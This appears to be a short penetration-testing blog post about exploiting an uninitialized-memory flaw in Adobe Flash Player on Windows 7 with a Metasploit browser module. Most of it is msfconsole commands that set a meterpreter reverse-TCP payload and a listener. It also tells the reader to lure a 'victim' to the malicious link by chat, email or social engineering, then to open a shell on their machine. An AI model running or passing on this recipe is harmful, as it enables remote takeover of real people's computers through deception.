Categories

Archives

Kali Linux, Penetration Testing

Exploit Remote PC using Adobe Flash Player Uncompress Via Zlib Variant Uninitialized Memory

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::Uncompress Via ZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set lhost 192.168.1.13 (IP of Local Host)

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set srvhost 192.168.1.13

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set uripath /

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>exploit

Now an URL you should give to your victim http://192.168.1.13:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.13:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.